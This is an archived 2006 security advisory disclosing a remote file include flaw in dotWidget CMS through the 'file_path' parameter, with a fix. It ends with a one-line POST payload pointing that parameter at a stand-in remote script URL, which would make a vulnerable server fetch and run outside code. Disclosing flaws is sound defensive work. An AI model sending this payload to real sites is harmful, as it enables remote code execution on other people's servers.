Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: b06-2690.htm

dotWidget CMS <= 1.0.6 - Remote File Include Vulnerability



dotWidget CMS <= 1.0.6 - Remote File Include Vulnerability
dotWidget CMS <= 1.0.6 - Remote File Include Vulnerability



[MajorSecurity #7]dotWidget CMS <= 1.0.6 - Remote File Include Vulnerability=0D
-------------------------------------------------------------------------------------=0D
=0D
Software: dotWidget CMS=0D
=0D
Version: <=1.0.6=0D
=0D
Type: Remote File Include Vulnerability=0D
=0D
Date: June, 2nd 2006=0D
=0D
Vendor: dotWidget  =0D
=0D
Page: http://dotwigdet.com=0D 
=0D
Risc: High=0D
=0D
=0D
Credits:=0D
----------------------------=0D
=0D
Discovered by: David 'Aesthetico' Vieira-Kurz=0D
http://www.majorsecurity.de=0D 
=0D
Original Advisory:=0D
----------------------------=0D
http://www.majorsecurity.de/advisory/major_rls7.txt=0D 
=0D
Affected Products:=0D
----------------------------=0D
=0D
dotWidget CMS 1.0.6 and prior=0D
=0D
Description:=0D
----------------------------=0D
=0D
dotWidget CMS is content management at its easiest. Update your site's content in real-time.=0D
Features include a built-in WYSIWYG text editor, multiple users and access levels, =0D
customizable templates and more.=0D
=0D
Requirements:=0D
----------------------------=0D
=0D
register_globals = On=0D
=0D
=0D
Vulnerability:=0D
----------------------------=0D
=0D
Input passed to the "file_path" parameter in "index.php" "feedback.php" and "printfriendly.php" =0D
is not properly verified, before it is used to include files.=0D
This can be exploited to execute arbitrary code by including files from external resources.=0D
=0D
Solution:=0D
----------------------------=0D
=0D
Edit the source code to ensure that input is properly sanitised.=0D
Set "register_globals" to "Off".=0D
=0D
Exploitation:=0D
----------------------------=0D
=0D
Post data:=0D
=0D
file_path=http://www.yourspace.com/yourscript.php? 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH